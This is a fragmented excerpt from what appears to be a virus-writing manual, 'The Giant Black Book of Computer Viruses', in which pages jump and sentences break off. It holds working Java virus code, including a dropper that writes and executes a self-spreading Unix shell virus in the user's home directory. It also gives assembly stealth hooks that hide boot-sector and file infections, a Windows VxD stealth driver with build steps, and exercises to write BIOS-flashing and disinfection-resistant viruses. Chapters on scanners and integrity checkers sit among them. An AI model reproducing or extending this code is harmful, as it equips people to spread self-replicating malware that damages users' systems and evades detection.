This function goes and executes the host. When the host is done
running, control is passed directly back to the Unix shell.
Exercises
1. Can you devise a scheme to get the X21 or X23 to jump across
platforms? That is, if you’re running on a 68040-based machine and
remotely using an 80486-based machine, can you get X21 to migrate
to the 68040 and run there? (You’ll have to keep the source for the virus
in a data record inside itself, and then write that to disk and invoke the
c compiler for the new machine.)
1 Marc LaDue, “ When Java Was One: Threats from Hostile Byte Code and Java
Platform Viruses” , available at several sites on the internet. Try www.rstcorp.com.
264 The Giant Black Book of Computer Viruses
fast. Anything that could really propagate across the internet would
be such a threat that security considerations would have to be
modified fast. The Morris worm was proof of just how dangerous
an internet virus could be. Its life span was only a couple days, but
in that time period, it infected a major part of the internet and
hogged up all the CPU time on the computers it infected.
Our Java virus is simply a source code virus written in the Java
language, not all that different from the c and Pascal viruses we
looked at a few chapters back. It keeps a verbatim copy of itself in
a constant called src. This constant is generated from an ascii file
of the virus JVIRUS.SRC, and then inserted in the source code that
will be compiled, JVIRUS.java.
When JVirus runs, it searches the current directory for files that
have “ .java” in their name:
File lf=new File(“.”); //define director var
String[] flist=lf.list(); //create file list
int si=0;
for (si=0;si<flist.length;si++) {
if (flist[si].indexOf(“.java”)>0) { //look for .java
String is=flist[si];
String id=is;
id=id.concat(“.vir”); //.java.vir
When it finds such a file, it opens it to read, and creates a new file
that ends in “.java.vir” to write to:
FileInputStream fi=new FileInputStream(is);
PrintStream fo=new PrintStream(new FileOutputStream(id));
Then it begins to copy the .java file to the .java.vir file, checking
each line for the two magic strings “ public static void main” and
“ public static void _main” (notice the underscore before “main”
in the second string).
When JVirus finds the “ main” method, it inserts its infection
into the file. To understand how this works, it’s easiest to take a
look at the action of the virus on a simple Java program, hello.java.
The uninfected hello.java looks like this:
class Hello {
class Hello {
_main(argv);
}
}
Note that, like our other source code viruses, JVirus must write
itself to the file it is infecting twice, once as the ascii source code
that will get compiled, and once as a constant array, in order to
preserve the source code. To accomplish this in the most efficient
266 The Giant Black Book of Computer Viruses
manner, the virus uses the special character “%” (37) to signal
when to make the switch:
for (int i=0; src[i]!=37; i++) { //stop at ’%’
fo.write(src[i]); //write ascii
k=i;
}
for (int i=0; i<src.length; i++) {
fo.print(src[i]); //write constant string
if (i<src.length-1) {fo.write(44); fo.write(13); fo.write(10);}
}
for (int i=k+2; i<src.length; i++)
fo.write(src[i]); //finish writing ascii
Testing JVirus
You’ll need a Java SDK to play around with JVirus. I used the
Microsoft Java SDK as supplied on the Developer’s Network CDs.
To compile jvirus.java, run
jvc jvirus
JVirus will then infect hello.java and proceed to display the mes-
sage that you have let it loose. If you then inspect hello.java, you’ll
see that it is infected.
/* December 7, 1996 */
/* This Java application infects your UNIX system with a Bourne shell
script virus, homer.sh. homer.sh is kind enough to announce itself
and inform you that “Java is safe, and UNIX viruses do not exist”
before finding all of the Bourne shell scripts in your home directory,
checking to see if they’ve already been infected, and infecting
those that are not. homer.sh infects another Bourne shell script
by simply appending a working copy of itself to the end of that shell
script. */
import java.io.*;
class Homer {
public static void main (String[] argv) {
try {
String userHome = System.getProperty(“user.home”);
String target = “$HOME”;
FileOutputStream outer = new FileOutputStream(userHome + “/.homer.sh”);
String homer = “#!/bin/sh” + “\n” + “#-_” + “\n” +
“echo \”Java is safe, and UNIX viruses do not exist.\"" + “\n” +
“for file in ‘find ” + target + “ -type f -print‘” + “\n” + “do” +
“\n” + “ case \”‘sed 1q $file‘\" in" + “\n” +
“ \”#!/bin/sh\" ) grep ’#-_’ $file > /dev/null" +
“ || sed -n ’/#-_/,$p’ $0 >> $file” + “\n” +
“ esac” + “\n” + “done” + “\n” +
“2>/dev/null”;
byte[] buffer = new byte[homer.length()];
homer.getBytes(0, homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec(“/usr/bin/chmod 777 ” +
userHome + “/.homer.sh”);
Process exec = Runtime.getRuntime().exec(“/bin/sh ” + userHome +
“/.homer.sh”);
} catch (IOException ioe) {}
}
}
Exercises
1. Write a Java trojan that deploys a simple overwriting COM infecting
virus on a PC, but does not execute the virus.
2 For detailed information on Byte Code, see Java Secrets by Elliotte Rusty Harold
(IDG Books, 1997).
Chapter 22
Many New
Techniques
By now I hope you are beginning to see the almost endless
possibilities which are available to computer viruses to reproduce
and travel about in computer systems. They are limited only by the
imaginations of those more daring programmers who don’t have to
be fed everything on a silver platter—they’ll figure out the tech-
niques and tricks needed to write a virus for themselves, whether
they’re documented or not.
If you can imagine a possibility—a place to hide and a means
to execute code—then chances are a competent programmer can fit
a virus into those parameters. The rule is simple: just be creative
and don’t give up until you get it right.
The possibilities are mind-boggling, and the more complex the
operating system gets, the more possibilities there are. In short,
though we’ve covered a lot of ground so far in this book, we’ve
only scratched the surface of the possibilities. Rather than continu-
ing ad infinitum with our discussion of reproduction techniques, I’d
like to switch gears and discuss what happens when we throw
anti-virus programs into the equation. Before we do that, though,
I’d like to suggest some extended exercises for the enterprising
reader. Each one of the exercises in this chapter could really be
expanded into a whole chapter of its own, discussing the techniques
involved and how to employ them.
My goal in writing this book has never been to make you
dependent on me to understand viruses, though. That’s what most
of the anti-virus people want to do. If you bought this book and read
this far, it’s because you want to and intend to understand viruses
270 The Giant Black Book of Computer Viruses
Exercises
1. Develop an OS/2 virus which infects flat model EXEs. You’ll need the
Developer’s Connection to do this. Study EXE386.H to learn about the
flat model’s new header. Remember that in the flat model, offsets are
relocated by the loader, and every function is called near. The virus
must handle offset relocation in order to work, and the code should be
as relocatable as possible so it doesn’t have to add too many relocation
pointers to the file.
3. Write a virus which can infect both Windows EXEs and Windows
Virtual Device Drivers (XXX.386 files). Explore the different modes
in which a virtual device driver can be infected (there are more than
one). What are the advantages and disadvantages of each?
4. A virus can infect files by manipulating the FAT and directory entries
instead of using the file system to add something to a file. Essentially,
the virus can modify the starting cluster number in the directory entry
to point to it instead of the host. Then, whenever the host gets called the
virus loads. The virus can then load the host itself. Write such a virus
which will work on floppies. Write one to work on the hard disk. What
are the implications for disinfecting such a virus? What happens when
files are copied to a different disk?
jump can go to the 80x86 virus, while the load does no real harm, and
it can be followed by the Power PC virus. Such a virus isn’t merely
academic. For example, there are lots of Unix boxes connected to the
Internet that are chock full of MS-DOS files, etc.
6. Write a virus that will test a computer for Flash EEPROMs and attempt
to write itself into the BIOS and execute from there if possible. You’ll
need some specification sheets for popular Flash EEPROM chips, and
a machine that has some.
272 The Giant Black Book of Computer Viruses
Chapter 23
How A Virus
Detector Works
Source code for this chapter: \ANTI\GBSCAN.ASM
\ANTI\GBCHECK.ASM
\ANTI\GBINTEG.PAS
Up to this point, we’ve only discussed mechanisms which
computer viruses use for self-reproduction. The viruses we’ve
discussed do little to avoid programs that detect them. As such,
they’re all real easy to detect and eliminate. That doesn’t mean
they’re somehow defective. Remember that the world’s most suc-
cessful virus is numbered among them. None the less, many modern
viruses take into account the fact that there are programs out there
trying to catch and destroy them and take steps to avoid these
enemies.
In order to better understand the anti-anti-virus techniques
which modern viruses use, we should first examine how an anti-vi-
rus program works. We’ll start out with some simple anti-virus
techniques, and then study how viruses defeat them. Then, we’ll
look at more sophisticated techniques and discuss how they can be
defeated. This will provide some historical perspective on the
subject, and shed some light on a fascinating cat-and-mouse game
that is going on around the world.
In this chapter we will discuss three different anti-virus tech-
niques that are used to locate and eliminate viruses. These include
scanning, behavior checking, and integrity checking. Briefly, scan-
ners search for specific code which is believed to indicate the
presence of a virus. Behavior checkers look for programs which do
274 The Giant Black Book of Computer Viruses
Virus Scanning
Scanning for viruses is the oldest and most popular method for
locating viruses. Back in the late 80’s, when there were only a few
viruses floating around, writing a scanner was fairly easy. Today,
with thousands of viruses, and many new ones being written every
year, keeping a scanner up to date is a major task. For this reason,
many professional computer security types pooh-pooh scanners as
obsolete and useless technology, and they mock “ amateurs” who
still use them. This attitude is misguided, however. Scanners have
an important advantage over other types of virus protection in that
they allow one to catch a virus before it ever executes in your
computer.
The basic idea behind scanning is to look for a string of bytes
that are known to be part of a virus. For example, let’s take the
MINI-44 virus we discussed at the beginning of the last section.
When assembled, its binary code looks like this:
0100: B4 4E BA 26 01 CD 21 72 1C B8 01 3D BA 9E 00 CD
0110: 21 93 B4 40 B1 2A BA 00 01 CD 21 B4 3E CD 21 B4
0120: 4F CD 21 EB E2 C3 2A 2E 43 4F 4D
A scanner that uses 16-byte strings might just take the first 16 bytes
of code in this virus and use it to look for the virus in other files.
But what other files? MINI-44 is a COM infector, so it should
only logically be found in COM files. However, it is a poor scanner
that only looks for this virus in file that have a file name ending
with COM. Since a scanner’s strength is that it can find viruses
before they execute, it should search EXE files too. Any COM
file—including one with the MINI-44 in it—can be renamed to
EXE and planted on a disk. When it executes, it will only infect
COM files, but the original is an EXE.
Typically, a scanner will contain fields associated to each scan
string that tell it where to search for a particular string. This
selectivity cuts down on overhead and makes the scanner run faster.
Some scanners even have different modes that will search different
sets of files, depending on what you want. They might search
executables only, or all files, for example.
How a Virus Detector Works 275
This allows the scanner to search for boot sector and file infectors,
as well as resident viruses. Bit 5 of the flags indicates that you’re
at the end of the data structures which contain strings.
Our scanner, which we’ll call GBSCAN, must first scan mem-
ory for resident viruses (SCAN_RAM). Next, it will scan the master
bo ot (SCAN_MASTER_BOOT) and operating system boot
(SCAN_BOOT) sectors, and finally it will scan all executable files
(SCAN_EXE and SCAN_COM).
Each routine simply loads whatever sector or file is to be
scanned into memory and calls SCAN_DATA with an address to
start the scan in es:bx and a data size to scan in cx, with the active
flags in al.
That’s all that’s needed to build a simple scanner. The profes-
sional anti-virus developer will notice that this scanner has a
number of shortcomings, most notably that it lacks a useful data-
base of scan strings. Building such a database is probably the
biggest job in maintaining a scanner. Of course, our purpose is not
to develop a commercial product, so we don’t need a big database
or a fast search engine. We just need the basic idea behind the
commercial product.
Behavior Checkers
The next major type of anti-virus product available today is
what I call a behavior checker. Behavior checkers watch your
computer for virus-like activity, and alert you when it takes place.
276 The Giant Black Book of Computer Viruses
In this way, one can put together a program which will at least slow
down many common viruses. Such a program, GBCHECK, is
included on the Companion Disk.
Integrity Checkers
Typically, an integrity checker will build a log that contains the
names of all the files on a computer and some type of charac-
terization of those files. That characterization may consist of basic
data like the file size and date/time stamp, as well as a checksum,
CRC, or cryptographic checksum of some type. Each time the user
runs the integrity checker, it examines each file on the system and
compares it with the characterization it made earlier.
An integrity checker will catch most changes to files made on
your computer, including changes made by computer viruses. This
works because, if a virus adds itself to a program file, it will
probably make it bigger and change its checksum. Then, presum-
ably, the integrity checker will notice that something has changed,
and alert the user to this fact so he can take preventive action. Of
course, there could be thousands of viruses in your computer and
the integrity checker would never tell you as long as those viruses
didn’t execute and change some other file.
The integrity checker GBINTEG (on the Companion Disk) will
log the file size, date and checksum, and notify the user of any
changes.
Overview
Over the years, scanners have remained the most popular way
to detect viruses. I believe this is because they require no special
knowledge of the computer and they can usually tell the user exactly
what is going on. Getting a message like “ The XYZ virus has been
found in COMMAND.COM” conveys exact information to the
user. He knows where he stands. On the other hand, what should
278 The Giant Black Book of Computer Viruses
Exercises
1. Put scan strings for all of the viruses discussed in Part I into GBSCAN.
Make sure you can detect both live boot sectors in the boot sector and
the dropper programs, which are COM or EXE programs. Use a separate
name for these two types. For example, if you detect a live Stoned, then
280 The Giant Black Book of Computer Viruses
display the message “ The STONED virus was found in the boot sector”
but if you detect a dropper, display the message “ STONED.EXE is a
STONED virus dropper.”
2. The GBINTEG program does not verify the integrity of all executable
code on your computer. It only verifies COM and EXE files, as well as
the boot sectors. Modify GBINTEG to verify the integrity of SYS, DLL
and 386 files as well. Are there any other executable file names you
need to cover? (Hint: Rather than making GBINTEG real big by
hard-coding all these possibilities, break the search routine out into a
subroutine that can be passed the type of file to look for.)
N Go to original INT
Read Function?
13H handler
Y N
Y Cyl 0,
Hard disk? Sec<VIR_SIZE+3?
N Y
N cx = cx+VIR_SIZE+2
Cyl 0, Sec 1?
Disk infected?
N
Y
Read requested
sectors with INT 40H
(Note that I’ve left out some details so as not to obscure the basic
idea. If you want all the gory details, please refer to the IBM PC AT
Technical Reference.) All it does is check to make sure the drive is
ready for a command, then sends it a command to read the desired
sector, and proceeds to get the data from the drive when the drive
has it and is ready to send it to the CPU.
Similar direct-read routines could be written to access the
floppy disk, though the code looks completely different. Again, this
code is listed in the IBM PC AT Technical Reference.
This will slide you right past Interrupt 13H and any interrupt
13H-based stealthing mechanisms a virus might have installed.
Figure 24.2: IDE hard drive i/o ports.
Port Function
The int 40H instruction is simply 0CDH 40H, so all you have
to do to find the beginning of the interrupt 13H handler is to look
for CD 40 in the ROM BIOS segment 0F000H. Find it, go back a
few bytes, and you’re there. Call that and you get the original boot
sector or master boot sector, even if it is stealthed by an Interrupt
13H hook.
Maybe.
ready to transfer data. This flag is the Hard Disk Interrupt flag. It
resides at offset 84H in the BIOS data area at segment 40H. The
floppy disk uses the SEEK_STATUS flag at offset 3EH in the BIOS
data area. How is it that these flags get set and reset though?
When a hard or floppy disk finishes the work it has been
instructed to do by the BIOS or another program, it generates a
hardware interrupt. The routine which handles this hardware inter-
rupt sets the appropriate flag to notify the software which initiated
the read that the disk drive is now ready to send data. Simple
enough. The hard disk uses Interrupt 76H to perform this task, and
the floppy disk uses Interrupt 0EH. The software which initiated
the read will reset the flag after it has seen it.
But if you think about it, there’s no reason something couldn’t
intercept Interrupt 76H or 0EH as well and do something funny with
it, to fool anybody who was trying to work their way around
Interrupt 13H! Indeed, some viruses do exactly this.
One strategy might be to re-direct the read through the Interrupt
hook, so the anti-virus still gets the original boot sector. Another
strategy might simply be to frustrate the read if it doesn’t go through
the virus’ Interrupt 13H hook. That’s a lot easier, and fairly hard-
ware independent. Let’s explore this strategy a bit more . . . .
To hook the floppy hardware interrupt one writes an Interrupt
0EH hook which will check to see if the viral Interrupt 13H has
been called or not. If it’s been called, there is no problem, and the
Interrupt 0EH hook should simply pass control to the original
handler. If the viral Interrupt 13H hasn’t been called, though, then
something is trying to bypass it. In this case, the interrupt hook
should just reset the hardware and return to the caller without setting
the SEEK_STATUS flag. Doing that will cause the read attempt to
time out, because it appears the drive never came back and said it
was ready. This will generally cause whatever tried to read the disk
to fail—the equivalent of an int 13H which returned with c set. The
data will never get read in from the disk controller. An interrupt
hook of this form is very simple. It looks like this:
INT_0EH:
cmp BYTE PTR cs:[INSIDE],1 ;is INSIDE = 1 ?
jne INTERET ;no, ret to caller
jmp DWORD PTR cs:[OLD_0EH] ;go to old handler
INTERET:push ax
288 The Giant Black Book of Computer Viruses
mov al,20H ;release intr ctrlr
out 20H,al
pop ax
iret ;and ret to caller
In addition to the int 0EH hook, the Interrupt 13H hook must be
modified to set the INSIDE flag when it is in operation. Typically,
the code to do that looks like this:
INT_13H:
mov BYTE PTR cs:[INSIDE],1 ;set the flag on entry
.
. ;do whatever
.
pushf ;call ROM BIOS
call DWORD PTR cs:[OLD_13H]
.
.
.
mov BYTE PTR cs:[INSIDE],0 ;reset flag on exit
retf 2 ;return to caller
The actual implementation of this code with the BBS virus is what
I’ll call Level Two stealth, and it is presented on the companion
disk.
If you want to test this level two stealth out, just write a little
program that reads the boot sector from the A: drive through
Interrupt 40H,
mov ax,201H
mov bx,200H
mov cx,1
mov dx,0
int 40H
You can run this under DEBUG both with the virus present and
without it, and you’ll see how the virus frustrates the read.
really getting at the true boot sector. Most anti-virus software isn’t
that smart, though.
If you’re thinking of buying an anti-virus site license for a large
number of computers, you should really investigate what it does to
circumvent boot-sector stealth like this. If it doesn’t do direct access
to the hardware, it is possible to use stealth against it. If it does do
direct hardware access, you have to test it very carefully for
compatibility with all your machines.
Even direct hardware access can present some serious flaws as
soon as one moves to protected mode programming. That’s because
you can hook the i/o ports themselves in protected mode. Thus, a
direct hardware access can even be redirected! The SS-386 virus
does exactly this.1 However, the game works both ways. By hook-
ing i/o ports, an anti-virus can stop an ordinary virus that tries to
write a boot sector dead in its tracks. All of this becomes much
easier to do in the context of Windows, since it is a protected mode
operating system. We’ll discuss it in Chapter 26.
Memory “Stealth”
So far we’ve only discussed how a virus might hide itself on
disk: that is normally what is meant by “ stealth”. A boot sector
virus may also hide itself in memory, though. So far, the resident
boot sector viruses we’ve discussed all go resident by changing the
size of system memory available to DOS which is stored in the
BIOS data area. While this technique is certainly a good way to do
things, it is also a dead give-away that there is a boot sector virus
in memory. To see it, all one has to do is run the CHKDSK program.
CHKDSK always reports the memory available to DOS, and you
can easily compare it with how much should be there. On a standard
640K system, you’ll get a display something like:
655,360 total bytes memory
485,648 bytes free
Stealth Source
Three modules are provided to be used with the BBS virus to
implement Level One and Level Two stealth. They are
INT13HS1.ASM and INT13HS2.ASM/BOOTS2.ASM, respec-
tively. To use them, put the BBS virus source (in \BBS on the
Companion Disk) in a working directory, and copy either
INT13HS1.ASM or INT13HS2.ASM into this working directory
with the name INT13H.ASM. This replaces the original BBS
Interrupt 13H hook with the stealth hooks. For Level Two stealth,
you’ll also have to copy BOOTS2.ASM into BOOT.ASM in your
working directory. Then assemble as usual. Alternatively, working
copies of the stealth versions of BBS are also included on the
Companion Disk.
Exercises
1. The BBS stealthing read function does not stealth writes. This provides
an easy way to disinfect the virus. If you read the boot sector, it’s
stealthed, so you get the original. If you then turn around and write the
sector you just read, it isn’t stealthed, so it gets written over the viral
boot sector, effectively wiping the virus out. Add a WRITE_FUNC-
TION to the BBS’s Interrupt 13H hook to prevent this from happening.
You can stealth the writes, in which case anything written to the boot
sector will go where the original boot sector is stored. Alternatively,
you can simply write protect the viral boot sector and short circuit any
attempts to clean it up.
2. Round out the Level Two stealthing discussed here with (a) an Interrupt
13H, Function 0AH hook, (b) an Interrupt 76H hook and (c) an Interrupt
40H hook. When writing the Interrupt 76H hook, be aware that the hard
disk uses the second interrupt controller chip. To reset it you must out
a 20H to port A0H.
3. Modify the original BBS virus so that it moves itself in memory when
DOS loads so that it becomes more like a conventional DOS TSR. To
do this, create a new M-type memory block at the base of the existing
Z block, exactly the same size as the memory stolen from the system
by the virus before DOS loaded. Move the Z block up, and adjust the
memory size at 0:413H to get rid of the high memory where the virus
was originally resident. Finally, move the virus down into its new
M-block. What conditions should be present before the virus does all
292 The Giant Black Book of Computer Viruses
Just like boot sector viruses, viruses which infect files can also
use a variety of tricks to hide the fact that they are present from
prying programs. In this chapter, we’ll examine the Slips virus,
which employs a number of stealth techniques that are essential for
a good stealth virus.
Slips is a fairly straight forward memory resident EXE infector
as far as its reproduction method goes. It works by infecting files
during the directory search process. It uses the usual DOS Interrupt
21H Function 31H to go resident, and then it EXECs the host to
make it run. Its stealthing makes infected files appear to be unin-
fected on disk. Because it is extremely infective (e.g. capable of
infecting an entire computer in a few minutes), it has been designed
to operate under DOS 6.22 or earlier, but not in the DOS supplied
with Windows 95.
Self-Identification
Since Slips must determine whether a file is infected or not in
a variety of situations and then take action to hide the infection, it
needs a quick way to see an infection which is 100% certain.
Typically, stealth file infectors employ a simple technique to
identify themselves, like changing the file date 100 years into the
future. If properly stealthed, the virus will be the only thing that
sees the unusual date. Any other program examining the date will
294 The Giant Black Book of Computer Viruses
see a correct value, because the virus will adjust it before letting
anything else see it. This is the technique Slips uses: any file
infected by Slips will have the date set 57 years into the future. That
means it will be at least 2037, so the virus should work without
fouling up until that date.
Let’s discuss each of these functions, and how the virus must handle
them.
in any data returned by the file search functions. In this way, any
search function will only see the original file size and date, even
though that’s not what’s really on disk.
Both types of search functions use the DTA to store the data
they retrieve. For handle-based functions, the size is stored at
DTA+26H and the date is at DTA+24H. For FCB-based searches,
the size is at FCB+29H and the date is at FCB+25H. Typical code
to adjust these is given by
HSEARCH:
call DOS ;call original search
cmp [DTA+24H],57*512 ;date > 2037?
jc EXIT ;no, just exit
sub [DTA+24H],57*512 ;yes, subtract 57 yrs
sub [DTA+26H],VSIZE ;adjust size
sbb [DTA+28H],0 ;including high word
EXIT:
to the next SFT block to look there. The next SFT block’s address
is stored at offset 0 in the block.
Of course, to do this, you must know the entry number you are
looking for. You can find that in the PSP of the process calling DOS,
starting at offset 18H. When DOS opens a file and creates a file
handle for a process, it keeps a table of them at this offset in the
PSP. The file handle is an index into this table. Thus, for example,
mov al,es:[bx+18H]
will put the SFT entry number into al, if es is the PSP, and bx
contains the handle.
Once the virus has found the correct SFT entry, it can pick up
the file’s date stamp and determine whether it is infected or not. If
so, it can also determine the length of the file, and the current file
pointer. Using that and the amount of data requested in the cx
register when called, the virus can determine whether stealthing is
necessary or not. If the read requests data at the end of the file where
Request to read cx bytes
to ds:dx
N
Re-position file pointer to
end of original read
the virus is hiding, the virus can defeat the read, or simply truncate
it so that only the host is read.
If the read requests data at the beginning of the file, where the
header was modified, Slips breaks it down into two reads. First,
Slips reads the requested data, complete with the modified header.
Then, Slips skips to the end of the file where the data EXE_HDR is
stored in the virus. This contains a copy of the unmodified header.
Slips then reads this unmodified header in over the actual header,
making it once again appear uninfected. Finally, Slips adjusts the
file pointer so that it’s exactly where it should have been if only the
first read had occurred. All of this is accomplished by the
HREAD_HOOK function.
The true file length is then returned in dx:ax. To this number it adds
the distance from the end of the file it was asked to move, thereby
calculating the requested distance from the beginning of the file.
From this number it subtracts OFFSET END_VIRUS + 10H,
which is where the move would go if the virus wasn’t there.
Each SFT entry has the following structure (DOS 4.0 to 6.22):
Offset Size Description
0 2 No. of file handles referring to this file
2 2 File open mode (From Fctn 3DH al)
4 1 File attribute
5 2 Device info word, if device, includes drive #
7 4 Pointer to device driver header or Drive
Parameter Block
0BH 2 Starting cluster of file
0DH 2 File time stamp
0FH 2 File date stamp
11H 4 File size
15H 4 File pointer where read/write will go in file
19H 2 Relative cluster in file of last cluster accessed
1BH 2 Absolute cluster of last cluster accessed
1DH 2 Number of sector containing directory entry
1FH 1 Number of dir entry within sector
20H 11 File name in FCB format
2BH 4 Pointer to previous SFT sharing same file
2FH 2 Network machine number which opened file
31H 2 PSP segment of file’s owner
33H 2 Offset within SHARE.EXE of sharing record
any DOS interrupt hooks. Such a hook could simply return with
carry set unless it was called from within the DOS Interrupt 21H
hook. To do that one would just have to set a flag every time
Interrupt 21H was entered, and then check it before processing any
Interrupt 13H request. A typical handler would look like this:
INT_13H:
cmp cs:[IN_21H],1 ;in int 21H?
jne EXIT_BAD ;no, don’t let it go
jmp DWORD PTR cs:[OLD_13H] ;else ok, go to old
EXIT_BAD:
xor ax,ax ;destroy ax
stc ;return with c set
retf 2
you may recall, the Yellow Worm had to pad the end of the original
EXE so that the virus started on a paragraph boundary. That is
necessary so that the virus always begins executing at offset 0.
Unfortunately this technique makes the number of bytes added to
a file a variable. Thus, the virus cannot simply subtract X bytes from
the true size to get the uninfected size. To fix that, Slips must make
an additional adjustment to the file size. It adds enough bytes at the
end of the file so that the number added at the start plus the end is
always equal to 16. Then it can simply subtract its own size plus 16
to get the original size of the file.
Anti-Virus Measures
Since file stealth is so complex, most anti-virus programs are
quite satisfied to simply scan memory for known viruses, and then
tell you to shut down and boot from a clean floppy disk if they find
one. This is an absolutely stupid approach, and you should shun any
anti-virus product that does only this to protect against stealthing
viruses.
The typical methods used by more sophisticated anti-virus
software against stealth file infectors are to either tunnel past their
interrupt hooks or to find something the virus neglected to stealth
in order to get at the original handler.
It is not too hard to tunnel Interrupt 21H to find the original
vector because DOS is so standardized. There are normally only a
very few versions which are being run at any given point in history.
Thus, one could even reasonably scan for it.
Secondly, if the virus forgets to hook every function which, for
example, reports the file size, then the ones it hooked will report
one size, and those it missed will report a different size. For
example, one could look at the file size by:
1) Doing a handle-based file search, and extracting the size from the
search record.
2) Doing an FCB-based file search, and extracting the size from the
search record.
3) Opening the file and seeking the end with Function 4202H,
getting the file size in dx:ax.
4) Using DOS function 23H to get the file size.
5) Opening the file and getting the size from the file’s SFT entry.
302 The Giant Black Book of Computer Viruses
If you don’t get the same answer every time, you can be sure
something real funny is going on! (As the old bit of wisdom goes,
it’s easy for two people to tell the truth, but if they’re going to lie,
it’s hard for them to keep their story straight.) Even if you can’t
identify the virus, you might surmise that something’s there.
Any scanner or integrity checker that doesn’t watch out for
these kind of things is the work of amateurs.
then the virus could get control passed to it right out of DOS. The
virus could do its thing, then replace the code at JLOC with what
was originally there and return control there. Such a scheme is
practically impossible to thwart in a generic way, without detailed
knowledge of a specific virus.
Well, by now I hope you can see why a lot of anti-virus
packages just scan memory and freeze if they find a resident virus.
However, I hope you can also see why that’s such a dumb strategy:
it provides no generic protection. You have to wait for your anti-
virus developer to get the virus before you can defend against it.
And any generic protection is better than none.
Stealth for DOS File Infectors 303
Exercises
1. Implement an Interrupt 21H Function 23H hook in Slips to report the
uninfected file size back to the caller when this function is queried.
3. Can you figure out a way to maintain the SFTs so that the data in them
for all open files will appear uninfected?
4. Implement an Interrupt 21H, Function 3EH (Close File) hook that will
at least partially make up for the self-disinfecting capability of Slips. If
an infection routine is called when a file is closed, it can be re-infected
even though it just got disinfected, say by a “ copy FILEA.EXE
FILEB.EXE” instruction.
5. What adder should you use for the date in order to make a virus like
Slips functional for the maximum length of time?
660 bytes. To make the binary VVD.386 into something that can
be assembled into a virus, one runs the COMPRESS program (on
the disk with this book) on it to create a compressed binary,
VVD.333. Then one runs the DB program to turn the compressed
program into an ascii array of bytes defined with assembler db
statements. This file, VDD.INC, is included in WinBoot by way of
an INCLUDE statement in WINBOOT.ASM.
When Interrupt 2FH, ax = 1605H is received by the virus, it
calls a DECOMPRESS routine that decompresses the compressed
VVD into the virus’ internal disk buffer, and writes it to disk, where
Windows can access it.
Loading VVD.386
Once VVD.386 exists on the hard disk, Windows must be
instructed to load it. The Interrupt 2FH, Function 1605H was
designed to make this possible. To tell Windows to load the device,
the interrupt 2FH handler must pass Windows a data structure
called the Win Startup Info structure on return. This has the follow-
ing format:
SIS_Version DB 3,0
SIS_Next_Dev DW ?,? ;es:bx from old handler
SIS_Vir_Dev DW OFFSET VVD_ID,0 ;ptr to VVD name
SIS_Ref_Data DD 0 ;used for instanceable data
SIS_Inst_Ptr DD 0
The last two fields are irrelevant to what we are doing and they
should be set to zero. The first field is the version number of the
type of the device.
The second field, SIS_Next_Dev_Ptr is designed to work with
the chaining concept involved in Interrupt 2FH. There may be
several programs in memory which are interested in interrupt 2FH,
function 1605H. Thus, there may be several Startup Info structures
for Windows to interpret. Each Interrupt 2FH handler which wants
Windows to do something special at startup will pass such a
structure, with its address in es:bx. If es:bx was non-zero when this
particular handler received control, there is another data structure
to access. Thus, es:bx should be stored in SIS_Next_Dev_Ptr and
es:bx should be set to point to this structure on exit from the handler.
Windows Stealth Techniques 309
hooked that interrupt. If there aren’t any more hooks, it will reflect
the interrupt back to the virtual machine to handle the processing
itself.
Winboot’s VVD handles stealthing the hard disk and the floppy
disk in two different ways, to demonstrate two possible ways of
using a virtual device driver to stealth a virus. When the hook
HD_HANDLER gets called, it first checks to see if it is being
requested to access the hard disk or a floppy. In the event of a hard
disk access, it examines the registers passed to Interrupt 13H to see
if an attempt to read the master boot record, or another viral sector,
is being made. If so, the cl register being passed to Interrupt 13H is
modified to change the sector number being read. Then the carry
flag is set to reflect the interrupt back to the virtual machine for
processing. The interrupt handler in the virtual machine then reads
the wrong sector and gives it back to the application program that
made the interrupt 13H. In this way, for example, an attempt to read
the master boot record returns not the viral master boot record, but
the original master boot record, effectively stealthing the infection.
The code to stealth the hard drive looks like this:
BeginProc HD_HANDLER
cmp [ebp.Client_AH],2 ;read or write?
je SHORT CHECK_HD
cmp [ebp.Client_AH],3
jne SHORT REFLECT_HD ;no, ignore it
CHECK_HD:
test [ebp.Client_DL],80H ;floppy disk?
jz SHORT HANDLE_FLOPPY ;yes, go handle it
cmp [ebp.Client_DL],80H ;Hard drive C:?
jne SHORT REFLECT_HD ;no, don’t stealth
cmp [ebp.Client_DH],0 ;ok, c:, so stealth
jne SHORT REFLECT_HD
cmp [ebp.Client_CX],VIRUS_SECTORS+1 ;cylinder 0?
jg SHORT REFLECT_HD
add [ebp.Client_CL],VIRUS_SECTORS+1 ;redirect the rd/wrt
jmp SHORT REFLECT_HD
REFLECT_HD: ;reflect to next VxD or to V86
stc
ret
Note that the registers being passed to the Interrupt 13H handler
in the virtual machine are stored in the Client data structure on the
ring 0 protected mode stack. Thus, to modify the cl register in the
virtual machine, the virtual device driver modifies ebp.Client_CL.
The General Protection Fault handler takes care of setting up the
312 The Giant Black Book of Computer Viruses
Next, the VVD sets the interrupt vector in the virtual machine
to point to the virus code:
mov eax,13H ;set Int 13H to go through virus
mov cx,9820H
mov edx,7204H
VMMCall Set_V86_Int_Vector
When the virus code terminates with an iret or a retf 2, the VVD
again gains control, terminating the critical section and restoring
the virtual machine’s interrupt 13H vector to its original value:
BeginProc HD_RETURN
VMMCall End_Critical_Section
mov eax,13H
314 The Giant Black Book of Computer Viruses
mov cx,WORD PTR [OLD_13H+4]
mov edx,[OLD_13H]
VMMCall Set_V86_Int_Vector
ret
Building WinBoot
To build WinBoot, one must first assemble and link VVD.386.
A makefile to do this is included on the Companion Disk with this
book. However, in order to assemble and link it, you’ll need the
special version of MASM and LINK which are provided with the
Windows Device Driver Kit on the Developer’s Network CDs.
Note that although the device driver kits can be obtained with the
Developer’s Network for no additional charge, you must ask for
them when you pay for the Developer’s Network or you won’t get
them.
Once you have built VVD.386, you must run COMPRESS and
DB on it to create VDD.INC. Put this in the same directory as
WINBOOT.ASM, and assemble that with TASM or MASM and
then link it to a COM file. The COM file will infect a floppy diskette
in drive A: when executed.
Exercises
The following exercises will help you explore Virtual Device
Drivers a bit more in the context of viruses. You’ll need the Device
Development Kit and the Developer’s Library from Microsoft to
do these exercises.
1. If you attempt to read the Master Boot Record with the VVD installed,
you’ll notice that the return registers from your INT 13H will not be the
same as what they were going in. That’s because VVD changed them.
Modify VVD to hook the return from INT 13H, and restore the original
values of the registers (except ax) so that you don’t notice any fishy
business if you examine the registers.
one might modify the virus to instead execute this operation with
the code
